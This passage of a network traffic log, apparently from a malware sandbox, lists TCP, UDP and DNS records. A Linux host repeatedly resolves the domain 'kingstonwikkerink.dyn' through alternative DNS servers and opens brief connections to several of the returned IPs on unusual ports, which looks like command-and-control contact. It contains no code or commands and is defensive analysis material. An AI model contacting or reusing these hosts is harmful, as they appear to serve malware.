Oct 26, 2024 19:02:31.699505091 CEST	59388	2052	192.168.2.23	193.233.193.45
Oct 26, 2024 19:02:31.701610088 CEST	2052	59390	193.233.193.45	192.168.2.23
Oct 26, 2024 19:02:31.701706886 CEST	59390	2052	192.168.2.23	193.233.193.45
Oct 26, 2024 19:02:31.705028057 CEST	2052	59388	193.233.193.45	192.168.2.23
Oct 26, 2024 19:02:31.707240105 CEST	2052	59390	193.233.193.45	192.168.2.23
Oct 26, 2024 19:02:33.022130013 CEST	2052	59388	193.233.193.45	192.168.2.23
Oct 26, 2024 19:02:33.022248983 CEST	59388	2052	192.168.2.23	193.233.193.45
Oct 26, 2024 19:02:33.022248983 CEST	59388	2052	192.168.2.23	193.233.193.45
Oct 26, 2024 19:02:33.040373087 CEST	2052	59390	193.233.193.45	192.168.2.23
Oct 26, 2024 19:02:33.040455103 CEST	59390	2052	192.168.2.23	193.233.193.45
Oct 26, 2024 19:02:33.040455103 CEST	59390	2052	192.168.2.23	193.233.193.45
Oct 26, 2024 19:02:35.435456038 CEST	43928	443	192.168.2.23	91.189.91.42
Oct 26, 2024 19:02:38.053879976 CEST	44542	5854	192.168.2.23	86.107.100.80
Oct 26, 2024 19:02:38.059619904 CEST	5854	44542	86.107.100.80	192.168.2.23
Oct 26, 2024 19:02:38.063308954 CEST	44542	5854	192.168.2.23	86.107.100.80
Oct 26, 2024 19:02:38.063308954 CEST	44542	5854	192.168.2.23	86.107.100.80
Oct 26, 2024 19:02:38.068636894 CEST	5854	44542	86.107.100.80	192.168.2.23
Oct 26, 2024 19:02:38.068672895 CEST	44544	5854	192.168.2.23	86.107.100.80
Oct 26, 2024 19:02:38.068734884 CEST	44542	5854	192.168.2.23	86.107.100.80
Oct 26, 2024 19:02:38.074007034 CEST	5854	44544	86.107.100.80	192.168.2.23
Oct 26, 2024 19:02:38.074085951 CEST	5854	44542	86.107.100.80	192.168.2.23
Oct 26, 2024 19:02:38.074260950 CEST	44544	5854	192.168.2.23	86.107.100.80
Oct 26, 2024 19:02:38.074287891 CEST	44544	5854	192.168.2.23	86.107.100.80
Oct 26, 2024 19:02:38.079705954 CEST	5854	44544	86.107.100.80	192.168.2.23
Oct 26, 2024 19:02:38.079870939 CEST	44544	5854	192.168.2.23	86.107.100.80
Oct 26, 2024 19:02:38.085191965 CEST	5854	44544	86.107.100.80	192.168.2.23
Oct 26, 2024 19:02:39.425894976 CEST	5854	44544	86.107.100.80	192.168.2.23
Oct 26, 2024 19:02:39.426023960 CEST	44544	5854	192.168.2.23	86.107.100.80
Oct 26, 2024 19:02:39.426023960 CEST	44544	5854	192.168.2.23	86.107.100.80
Oct 26, 2024 19:02:39.430068970 CEST	5854	44542	86.107.100.80	192.168.2.23
Oct 26, 2024 19:02:39.430171013 CEST	44542	5854	192.168.2.23	86.107.100.80
Oct 26, 2024 19:02:39.430234909 CEST	44542	5854	192.168.2.23	86.107.100.80
Oct 26, 2024 19:02:44.450402975 CEST	60928	14442	192.168.2.23	193.233.193.45
Oct 26, 2024 19:02:44.455938101 CEST	14442	60928	193.233.193.45	192.168.2.23
Oct 26, 2024 19:02:44.456106901 CEST	60928	14442	192.168.2.23	193.233.193.45
Oct 26, 2024 19:02:44.456140041 CEST	60928	14442	192.168.2.23	193.233.193.45
Oct 26, 2024 19:02:44.460814953 CEST	40288	14442	192.168.2.23	213.182.204.57
Oct 26, 2024 19:02:44.461507082 CEST	14442	60928	193.233.193.45	192.168.2.23
Oct 26, 2024 19:02:44.461563110 CEST	60928	14442	192.168.2.23	193.233.193.45
Oct 26, 2024 19:02:44.466212988 CEST	14442	40288	213.182.204.57	192.168.2.23
Oct 26, 2024 19:02:44.466270924 CEST	40288	14442	192.168.2.23	213.182.204.57
Oct 26, 2024 19:02:44.466288090 CEST	40288	14442	192.168.2.23	213.182.204.57
Oct 26, 2024 19:02:44.467190027 CEST	14442	60928	193.233.193.45	192.168.2.23
Oct 26, 2024 19:02:44.471630096 CEST	14442	40288	213.182.204.57	192.168.2.23
Oct 26, 2024 19:02:44.471771002 CEST	40288	14442	192.168.2.23	213.182.204.57
Oct 26, 2024 19:02:44.477091074 CEST	14442	40288	213.182.204.57	192.168.2.23
Oct 26, 2024 19:02:45.352273941 CEST	14442	40288	213.182.204.57	192.168.2.23
Oct 26, 2024 19:02:45.352341890 CEST	40288	14442	192.168.2.23	213.182.204.57
Oct 26, 2024 19:02:45.352371931 CEST	40288	14442	192.168.2.23	213.182.204.57
Oct 26, 2024 19:02:45.352442026 CEST	14442	40288	213.182.204.57	192.168.2.23
Oct 26, 2024 19:02:45.352518082 CEST	40288	14442	192.168.2.23	213.182.204.57
Oct 26, 2024 19:02:47.393995047 CEST	14442	60928	193.233.193.45	192.168.2.23
Oct 26, 2024 19:02:47.394073963 CEST	60928	14442	192.168.2.23	193.233.193.45
Oct 26, 2024 19:02:47.394277096 CEST	60928	14442	192.168.2.23	193.233.193.45
Oct 26, 2024 19:02:47.721708059 CEST	42836	443	192.168.2.23	91.189.91.43
Oct 26, 2024 19:02:51.817131996 CEST	42516	80	192.168.2.23	109.202.202.202
Oct 26, 2024 19:02:55.385406971 CEST	48836	7336	192.168.2.23	88.151.195.22
Oct 26, 2024 19:02:55.390774965 CEST	7336	48836	88.151.195.22	192.168.2.23
Oct 26, 2024 19:02:55.390836000 CEST	48836	7336	192.168.2.23	88.151.195.22
Oct 26, 2024 19:02:55.390866041 CEST	48836	7336	192.168.2.23	88.151.195.22
Oct 26, 2024 19:02:55.396225929 CEST	7336	48836	88.151.195.22	192.168.2.23
Oct 26, 2024 19:02:55.396291971 CEST	48836	7336	192.168.2.23	88.151.195.22
Oct 26, 2024 19:02:55.401588917 CEST	7336	48836	88.151.195.22	192.168.2.23
Oct 26, 2024 19:02:56.343770981 CEST	7336	48836	88.151.195.22	192.168.2.23
Oct 26, 2024 19:02:56.343818903 CEST	48836	7336	192.168.2.23	88.151.195.22
Oct 26, 2024 19:02:56.343858957 CEST	48836	7336	192.168.2.23	88.151.195.22
Oct 26, 2024 19:02:57.434391975 CEST	38028	5090	192.168.2.23	194.87.198.29
Oct 26, 2024 19:02:57.439975023 CEST	5090	38028	194.87.198.29	192.168.2.23
Oct 26, 2024 19:02:57.440040112 CEST	38028	5090	192.168.2.23	194.87.198.29
Oct 26, 2024 19:02:57.440078974 CEST	38028	5090	192.168.2.23	194.87.198.29
Oct 26, 2024 19:02:57.445425034 CEST	5090	38028	194.87.198.29	192.168.2.23
Oct 26, 2024 19:02:57.445470095 CEST	38028	5090	192.168.2.23	194.87.198.29
Oct 26, 2024 19:02:57.450850010 CEST	5090	38028	194.87.198.29	192.168.2.23
Oct 26, 2024 19:03:01.376748085 CEST	40246	8089	192.168.2.23	195.133.92.51
Oct 26, 2024 19:03:01.382282972 CEST	8089	40246	195.133.92.51	192.168.2.23
Oct 26, 2024 19:03:01.382354975 CEST	40246	8089	192.168.2.23	195.133.92.51
Oct 26, 2024 19:03:01.382354975 CEST	40246	8089	192.168.2.23	195.133.92.51
Oct 26, 2024 19:03:01.387646914 CEST	8089	40246	195.133.92.51	192.168.2.23
Oct 26, 2024 19:03:01.388060093 CEST	40246	8089	192.168.2.23	195.133.92.51
Oct 26, 2024 19:03:01.393429995 CEST	8089	40246	195.133.92.51	192.168.2.23
Oct 26, 2024 19:03:02.290785074 CEST	8089	40246	195.133.92.51	192.168.2.23
Oct 26, 2024 19:03:02.290931940 CEST	40246	8089	192.168.2.23	195.133.92.51
Oct 26, 2024 19:03:02.290976048 CEST	40246	8089	192.168.2.23	195.133.92.51
Oct 26, 2024 19:03:07.447273016 CEST	38028	5090	192.168.2.23	194.87.198.29
Oct 26, 2024 19:03:07.452717066 CEST	5090	38028	194.87.198.29	192.168.2.23
Oct 26, 2024 19:03:07.906862974 CEST	5090	38028	194.87.198.29	192.168.2.23
Oct 26, 2024 19:03:07.907011032 CEST	38028	5090	192.168.2.23	194.87.198.29
Oct 26, 2024 19:03:16.393909931 CEST	43928	443	192.168.2.23	91.189.91.42
Oct 26, 2024 19:03:22.337965012 CEST	50318	17588	192.168.2.23	194.87.198.29
Oct 26, 2024 19:03:22.343348980 CEST	17588	50318	194.87.198.29	192.168.2.23
Oct 26, 2024 19:03:22.343461990 CEST	50318	17588	192.168.2.23	194.87.198.29
Oct 26, 2024 19:03:22.343502045 CEST	50318	17588	192.168.2.23	194.87.198.29
Oct 26, 2024 19:03:22.348815918 CEST	17588	50318	194.87.198.29	192.168.2.23
Oct 26, 2024 19:03:22.348864079 CEST	50318	17588	192.168.2.23	194.87.198.29
Oct 26, 2024 19:03:22.354321957 CEST	17588	50318	194.87.198.29	192.168.2.23
Oct 26, 2024 19:03:32.351788044 CEST	50318	17588	192.168.2.23	194.87.198.29
Oct 26, 2024 19:03:32.357364893 CEST	17588	50318	194.87.198.29	192.168.2.23
Oct 26, 2024 19:03:32.811197042 CEST	17588	50318	194.87.198.29	192.168.2.23
Oct 26, 2024 19:03:32.811434031 CEST	50318	17588	192.168.2.23	194.87.198.29
Oct 26, 2024 19:04:27.967972994 CEST	38028	5090	192.168.2.23	194.87.198.29
Oct 26, 2024 19:04:27.973517895 CEST	5090	38028	194.87.198.29	192.168.2.23
Oct 26, 2024 19:04:28.508681059 CEST	5090	38028	194.87.198.29	192.168.2.23
Oct 26, 2024 19:04:28.509080887 CEST	38028	5090	192.168.2.23	194.87.198.29
Oct 26, 2024 19:04:52.872533083 CEST	50318	17588	192.168.2.23	194.87.198.29
Oct 26, 2024 19:04:52.878186941 CEST	17588	50318	194.87.198.29	192.168.2.23
Oct 26, 2024 19:04:53.332031012 CEST	17588	50318	194.87.198.29	192.168.2.23
Oct 26, 2024 19:04:53.332350969 CEST	50318	17588	192.168.2.23	194.87.198.29
Oct 26, 2024 19:05:48.568890095 CEST	38028	5090	192.168.2.23	194.87.198.29
Oct 26, 2024 19:05:48.574636936 CEST	5090	38028	194.87.198.29	192.168.2.23
Oct 26, 2024 19:05:49.028398991 CEST	5090	38028	194.87.198.29	192.168.2.23
Oct 26, 2024 19:05:49.028660059 CEST	38028	5090	192.168.2.23	194.87.198.29

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 26, 2024 19:02:18.200709105 CEST	38000	53	192.168.2.23	51.158.108.203
Oct 26, 2024 19:02:18.216808081 CEST	53	38000	51.158.108.203	192.168.2.23
Oct 26, 2024 19:02:18.551146984 CEST	60402	53	192.168.2.23	51.158.108.203
Oct 26, 2024 19:02:18.567186117 CEST	53	60402	51.158.108.203	192.168.2.23
Oct 26, 2024 19:02:25.711785078 CEST	47469	53	192.168.2.23	65.21.1.106
Oct 26, 2024 19:02:25.713406086 CEST	41361	53	192.168.2.23	65.21.1.106
Oct 26, 2024 19:02:25.738838911 CEST	53	47469	65.21.1.106	192.168.2.23
Oct 26, 2024 19:02:25.740201950 CEST	53	41361	65.21.1.106	192.168.2.23
Oct 26, 2024 19:02:31.660063028 CEST	41942	53	192.168.2.23	65.21.1.106
Oct 26, 2024 19:02:31.662664890 CEST	33656	53	192.168.2.23	65.21.1.106
Oct 26, 2024 19:02:31.687747955 CEST	53	41942	65.21.1.106	192.168.2.23
Oct 26, 2024 19:02:31.689667940 CEST	53	33656	65.21.1.106	192.168.2.23
Oct 26, 2024 19:02:38.031555891 CEST	41727	53	192.168.2.23	51.158.108.203
Oct 26, 2024 19:02:38.044425011 CEST	56906	53	192.168.2.23	51.158.108.203
Oct 26, 2024 19:02:38.048377037 CEST	53	41727	51.158.108.203	192.168.2.23
Oct 26, 2024 19:02:38.062007904 CEST	53	56906	51.158.108.203	192.168.2.23
Oct 26, 2024 19:02:44.427119017 CEST	51015	53	192.168.2.23	80.152.203.134
Oct 26, 2024 19:02:44.432641983 CEST	48957	53	192.168.2.23	80.152.203.134
Oct 26, 2024 19:02:44.449693918 CEST	53	51015	80.152.203.134	192.168.2.23
Oct 26, 2024 19:02:44.460385084 CEST	53	48957	80.152.203.134	192.168.2.23
Oct 26, 2024 19:02:50.354298115 CEST	39915	53	192.168.2.23	178.254.22.166
Oct 26, 2024 19:02:52.395632982 CEST	48795	53	192.168.2.23	178.254.22.166
Oct 26, 2024 19:02:55.357342958 CEST	54774	53	192.168.2.23	81.169.136.222
Oct 26, 2024 19:02:55.385015965 CEST	53	54774	81.169.136.222	192.168.2.23
Oct 26, 2024 19:02:57.403805971 CEST	39358	53	192.168.2.23	81.169.136.222
Oct 26, 2024 19:02:57.432312012 CEST	53	39358	81.169.136.222	192.168.2.23
Oct 26, 2024 19:03:01.348203897 CEST	34621	53	192.168.2.23	217.160.70.42
Oct 26, 2024 19:03:01.375931978 CEST	53	34621	217.160.70.42	192.168.2.23
Oct 26, 2024 19:03:07.293071985 CEST	55645	53	192.168.2.23	5.161.109.23
Oct 26, 2024 19:03:12.297820091 CEST	60539	53	192.168.2.23	5.161.109.23
Oct 26, 2024 19:03:17.303195000 CEST	47316	53	192.168.2.23	139.84.165.176
Oct 26, 2024 19:03:22.309372902 CEST	45534	53	192.168.2.23	217.160.70.42
Oct 26, 2024 19:03:22.337086916 CEST	53	45534	217.160.70.42	192.168.2.23

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 26, 2024 19:02:18.200709105 CEST	192.168.2.23	51.158.108.203	0x45a0	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:18.551146984 CEST	192.168.2.23	51.158.108.203	0x45a0	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:25.711785078 CEST	192.168.2.23	65.21.1.106	0x352c	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:25.713406086 CEST	192.168.2.23	65.21.1.106	0x352c	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:31.660063028 CEST	192.168.2.23	65.21.1.106	0xc94f	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:31.662664890 CEST	192.168.2.23	65.21.1.106	0xc94f	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:38.031555891 CEST	192.168.2.23	51.158.108.203	0x38de	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:38.044425011 CEST	192.168.2.23	51.158.108.203	0x38de	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:44.427119017 CEST	192.168.2.23	80.152.203.134	0xa187	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:44.432641983 CEST	192.168.2.23	80.152.203.134	0xa187	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:50.354298115 CEST	192.168.2.23	178.254.22.166	0xd3fa	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:52.395632982 CEST	192.168.2.23	178.254.22.166	0xd3fa	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:55.357342958 CEST	192.168.2.23	81.169.136.222	0xd616	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:57.403805971 CEST	192.168.2.23	81.169.136.222	0xd616	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:03:01.348203897 CEST	192.168.2.23	217.160.70.42	0x731c	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:03:07.293071985 CEST	192.168.2.23	5.161.109.23	0x2179	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:03:12.297820091 CEST	192.168.2.23	5.161.109.23	0x7f67	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:03:17.303195000 CEST	192.168.2.23	139.84.165.176	0xbc41	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:03:22.309372902 CEST	192.168.2.23	217.160.70.42	0x98e4	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Oct 26, 2024 19:02:18.216808081 CEST	51.158.108.203	192.168.2.23	0x45a0	No error (0)	kingstonwikkerink.dyn	81.29.149.178	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:18.216808081 CEST	51.158.108.203	192.168.2.23	0x45a0	No error (0)	kingstonwikkerink.dyn	185.82.200.181	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:18.216808081 CEST	51.158.108.203	192.168.2.23	0x45a0	No error (0)	kingstonwikkerink.dyn	194.87.198.29	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:18.216808081 CEST	51.158.108.203	192.168.2.23	0x45a0	No error (0)	kingstonwikkerink.dyn	195.133.92.51	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:18.216808081 CEST	51.158.108.203	192.168.2.23	0x45a0	No error (0)	kingstonwikkerink.dyn	88.151.195.22	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:18.216808081 CEST	51.158.108.203	192.168.2.23	0x45a0	No error (0)	kingstonwikkerink.dyn	86.107.100.80	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:18.216808081 CEST	51.158.108.203	192.168.2.23	0x45a0	No error (0)	kingstonwikkerink.dyn	91.149.218.232	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:18.216808081 CEST	51.158.108.203	192.168.2.23	0x45a0	No error (0)	kingstonwikkerink.dyn	213.182.204.57	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:18.216808081 CEST	51.158.108.203	192.168.2.23	0x45a0	No error (0)	kingstonwikkerink.dyn	91.149.238.18	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:18.216808081 CEST	51.158.108.203	192.168.2.23	0x45a0	No error (0)	kingstonwikkerink.dyn	31.13.248.89	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:18.216808081 CEST	51.158.108.203	192.168.2.23	0x45a0	No error (0)	kingstonwikkerink.dyn	193.233.193.45	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:18.567186117 CEST	51.158.108.203	192.168.2.23	0x45a0	No error (0)	kingstonwikkerink.dyn	81.29.149.178	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:18.567186117 CEST	51.158.108.203	192.168.2.23	0x45a0	No error (0)	kingstonwikkerink.dyn	185.82.200.181	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:18.567186117 CEST	51.158.108.203	192.168.2.23	0x45a0	No error (0)	kingstonwikkerink.dyn	194.87.198.29	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:18.567186117 CEST	51.158.108.203	192.168.2.23	0x45a0	No error (0)	kingstonwikkerink.dyn	195.133.92.51	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:18.567186117 CEST	51.158.108.203	192.168.2.23	0x45a0	No error (0)	kingstonwikkerink.dyn	88.151.195.22	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:18.567186117 CEST	51.158.108.203	192.168.2.23	0x45a0	No error (0)	kingstonwikkerink.dyn	86.107.100.80	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:18.567186117 CEST	51.158.108.203	192.168.2.23	0x45a0	No error (0)	kingstonwikkerink.dyn	91.149.218.232	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:18.567186117 CEST	51.158.108.203	192.168.2.23	0x45a0	No error (0)	kingstonwikkerink.dyn	213.182.204.57	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:18.567186117 CEST	51.158.108.203	192.168.2.23	0x45a0	No error (0)	kingstonwikkerink.dyn	91.149.238.18	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:18.567186117 CEST	51.158.108.203	192.168.2.23	0x45a0	No error (0)	kingstonwikkerink.dyn	31.13.248.89	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:18.567186117 CEST	51.158.108.203	192.168.2.23	0x45a0	No error (0)	kingstonwikkerink.dyn	193.233.193.45	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:25.738838911 CEST	65.21.1.106	192.168.2.23	0x352c	No error (0)	kingstonwikkerink.dyn	91.149.238.18	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:25.738838911 CEST	65.21.1.106	192.168.2.23	0x352c	No error (0)	kingstonwikkerink.dyn	185.82.200.181	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:25.738838911 CEST	65.21.1.106	192.168.2.23	0x352c	No error (0)	kingstonwikkerink.dyn	81.29.149.178	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:25.738838911 CEST	65.21.1.106	192.168.2.23	0x352c	No error (0)	kingstonwikkerink.dyn	86.107.100.80	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:25.738838911 CEST	65.21.1.106	192.168.2.23	0x352c	No error (0)	kingstonwikkerink.dyn	31.13.248.89	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:25.738838911 CEST	65.21.1.106	192.168.2.23	0x352c	No error (0)	kingstonwikkerink.dyn	193.233.193.45	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:25.738838911 CEST	65.21.1.106	192.168.2.23	0x352c	No error (0)	kingstonwikkerink.dyn	91.149.218.232	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:25.738838911 CEST	65.21.1.106	192.168.2.23	0x352c	No error (0)	kingstonwikkerink.dyn	195.133.92.51	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:25.738838911 CEST	65.21.1.106	192.168.2.23	0x352c	No error (0)	kingstonwikkerink.dyn	194.87.198.29	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:25.738838911 CEST	65.21.1.106	192.168.2.23	0x352c	No error (0)	kingstonwikkerink.dyn	88.151.195.22	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:25.738838911 CEST	65.21.1.106	192.168.2.23	0x352c	No error (0)	kingstonwikkerink.dyn	213.182.204.57	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:25.740201950 CEST	65.21.1.106	192.168.2.23	0x352c	No error (0)	kingstonwikkerink.dyn	91.149.238.18	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:25.740201950 CEST	65.21.1.106	192.168.2.23	0x352c	No error (0)	kingstonwikkerink.dyn	185.82.200.181	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:25.740201950 CEST	65.21.1.106	192.168.2.23	0x352c	No error (0)	kingstonwikkerink.dyn	81.29.149.178	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:25.740201950 CEST	65.21.1.106	192.168.2.23	0x352c	No error (0)	kingstonwikkerink.dyn	86.107.100.80	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:25.740201950 CEST	65.21.1.106	192.168.2.23	0x352c	No error (0)	kingstonwikkerink.dyn	31.13.248.89	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:25.740201950 CEST	65.21.1.106	192.168.2.23	0x352c	No error (0)	kingstonwikkerink.dyn	193.233.193.45	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:25.740201950 CEST	65.21.1.106	192.168.2.23	0x352c	No error (0)	kingstonwikkerink.dyn	91.149.218.232	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:25.740201950 CEST	65.21.1.106	192.168.2.23	0x352c	No error (0)	kingstonwikkerink.dyn	195.133.92.51	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:25.740201950 CEST	65.21.1.106	192.168.2.23	0x352c	No error (0)	kingstonwikkerink.dyn	194.87.198.29	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:25.740201950 CEST	65.21.1.106	192.168.2.23	0x352c	No error (0)	kingstonwikkerink.dyn	88.151.195.22	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:25.740201950 CEST	65.21.1.106	192.168.2.23	0x352c	No error (0)	kingstonwikkerink.dyn	213.182.204.57	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:31.687747955 CEST	65.21.1.106	192.168.2.23	0xc94f	No error (0)	kingstonwikkerink.dyn	185.82.200.181	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:31.687747955 CEST	65.21.1.106	192.168.2.23	0xc94f	No error (0)	kingstonwikkerink.dyn	81.29.149.178	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:31.687747955 CEST	65.21.1.106	192.168.2.23	0xc94f	No error (0)	kingstonwikkerink.dyn	86.107.100.80	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:31.687747955 CEST	65.21.1.106	192.168.2.23	0xc94f	No error (0)	kingstonwikkerink.dyn	31.13.248.89	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:31.687747955 CEST	65.21.1.106	192.168.2.23	0xc94f	No error (0)	kingstonwikkerink.dyn	193.233.193.45	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:31.687747955 CEST	65.21.1.106	192.168.2.23	0xc94f	No error (0)	kingstonwikkerink.dyn	91.149.218.232	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:31.687747955 CEST	65.21.1.106	192.168.2.23	0xc94f	No error (0)	kingstonwikkerink.dyn	195.133.92.51	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:31.687747955 CEST	65.21.1.106	192.168.2.23	0xc94f	No error (0)	kingstonwikkerink.dyn	194.87.198.29	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:31.687747955 CEST	65.21.1.106	192.168.2.23	0xc94f	No error (0)	kingstonwikkerink.dyn	88.151.195.22	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:31.687747955 CEST	65.21.1.106	192.168.2.23	0xc94f	No error (0)	kingstonwikkerink.dyn	213.182.204.57	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:31.687747955 CEST	65.21.1.106	192.168.2.23	0xc94f	No error (0)	kingstonwikkerink.dyn	91.149.238.18	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:31.689667940 CEST	65.21.1.106	192.168.2.23	0xc94f	No error (0)	kingstonwikkerink.dyn	185.82.200.181	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:31.689667940 CEST	65.21.1.106	192.168.2.23	0xc94f	No error (0)	kingstonwikkerink.dyn	81.29.149.178	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:31.689667940 CEST	65.21.1.106	192.168.2.23	0xc94f	No error (0)	kingstonwikkerink.dyn	86.107.100.80	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:31.689667940 CEST	65.21.1.106	192.168.2.23	0xc94f	No error (0)	kingstonwikkerink.dyn	31.13.248.89	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:31.689667940 CEST	65.21.1.106	192.168.2.23	0xc94f	No error (0)	kingstonwikkerink.dyn	193.233.193.45	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:31.689667940 CEST	65.21.1.106	192.168.2.23	0xc94f	No error (0)	kingstonwikkerink.dyn	91.149.218.232	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:31.689667940 CEST	65.21.1.106	192.168.2.23	0xc94f	No error (0)	kingstonwikkerink.dyn	195.133.92.51	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:31.689667940 CEST	65.21.1.106	192.168.2.23	0xc94f	No error (0)	kingstonwikkerink.dyn	194.87.198.29	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:31.689667940 CEST	65.21.1.106	192.168.2.23	0xc94f	No error (0)	kingstonwikkerink.dyn	88.151.195.22	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:31.689667940 CEST	65.21.1.106	192.168.2.23	0xc94f	No error (0)	kingstonwikkerink.dyn	213.182.204.57	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:31.689667940 CEST	65.21.1.106	192.168.2.23	0xc94f	No error (0)	kingstonwikkerink.dyn	91.149.238.18	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:38.048377037 CEST	51.158.108.203	192.168.2.23	0x38de	No error (0)	kingstonwikkerink.dyn	193.233.193.45	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:38.048377037 CEST	51.158.108.203	192.168.2.23	0x38de	No error (0)	kingstonwikkerink.dyn	81.29.149.178	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:38.048377037 CEST	51.158.108.203	192.168.2.23	0x38de	No error (0)	kingstonwikkerink.dyn	185.82.200.181	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:38.048377037 CEST	51.158.108.203	192.168.2.23	0x38de	No error (0)	kingstonwikkerink.dyn	194.87.198.29	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:38.048377037 CEST	51.158.108.203	192.168.2.23	0x38de	No error (0)	kingstonwikkerink.dyn	195.133.92.51	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:38.048377037 CEST	51.158.108.203	192.168.2.23	0x38de	No error (0)	kingstonwikkerink.dyn	88.151.195.22	A (IP address)	IN (0x0001)	false
